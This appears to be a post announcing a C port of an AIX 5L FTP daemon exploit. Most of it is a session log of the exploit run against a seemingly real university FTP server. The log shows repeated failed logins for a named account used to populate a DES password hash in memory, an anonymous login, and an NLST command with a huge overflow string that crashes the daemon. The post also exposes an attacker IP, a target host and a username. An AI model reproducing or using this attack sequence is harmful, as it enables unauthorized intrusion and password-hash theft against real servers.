Attached is another version of my AIX 5L FTPd exploit written in C to be more portable & powerful between hosts :>

The exploit in action:

[root@vs2067037 kcope]# ./aix -h ftp.ABABABABABA.edu -i 85.25.67.37 -c jkateley
< 220 yuma FTP server (Version 4.1 Wed Mar 2 15:52:50 CST 2005) ready.
populating DES hash in memory...
> USER jkateley
< 331 Password required for jkateley.
> PASS abcdef
< 530 Login incorrect.
> USER jkateley
< 331 Password required for jkateley.
> PASS abcdef
< 530 Login incorrect.
> USER jkateley
< 331 Password required for jkateley.
> PASS abcdef
< 530 Login incorrect.
logging in...
> USER ftp
< 331 Guest login ok, send ident as password.
> PASS guest
< 230-Last unsuccessful login: Thu Jul 22 09:41:21 MDT 2010 on ssh from docsis1-137
230-Last login: Thu Jul 22 21:12:23 MDT 2010 on ftp from vs2067037.vserver.de
< 230 Guest login ok, access restrictions apply.
changing directory...
> CWD pub
< 250 CWD command successful.
triggering segmentation violation...
> NLST ~AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA